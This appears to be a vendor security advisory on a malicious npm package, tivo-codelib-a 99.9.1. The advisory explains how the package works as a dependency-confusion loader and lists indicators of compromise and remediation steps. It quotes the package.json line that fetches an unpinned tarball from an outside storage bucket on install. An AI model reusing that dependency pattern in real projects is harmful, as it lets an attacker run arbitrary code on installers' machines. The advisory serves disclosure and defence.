Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

tivo-codelib-anpm

Malicious code in tivo-codelib-a (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5453
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall tivo-codelib-a

What this malware does

[email protected] is an empty-stub npm package whose index.js exports module.exports = {} and whose package metadata (description, author) is blank. Its only effect on installers is its sole runtime dependency, which is declared in package.json as a direct HTTPS URL rather than a registry version: "ltidisafe": "https://ltidi.storage.googleapis.com/depenconf/ltidisafe-2.8.1.tgz". On npm install, npm fetches that tarball from a Google Cloud Storage bucket (ltidi.storage.googleapis.com/depenconf/) that does not correspond to any reputable publisher, installs it into the consumer's node_modules, and runs any lifecycle scripts it contains. The URL is not hash-pinned, so the bucket owner can swap the tarball contents at any time and ship arbitrary code to every installer. The package name pattern (-codelib-a), the unusually high version (99.9.1), the empty metadata, and the off-registry GCS dependency together match the dependency-confusion smuggler/loader shape: a hollow lure whose install resolves to attacker-controlled code hosted outside the registry.

Malicious versions

1 flagged
99.9.1

Indicators of compromise (SHA-256)

2c187e845e4c0d637709021a287c758e0206cb7adc46517391df4724d8af8cb7
57c9d90cd89beaed446ec71eacbe7fd7230972ebf844bd58a3199c2e4dbf3ed9

Frequently asked questions

No. tivo-codelib-a on npm has been identified as a malicious package (version 99.9.1 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005053IN-MAL-2026-005054

References

Credits

  • Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection
tivo-codelib-a (npm) malicious package — MAL-2026-5453 | O3 Security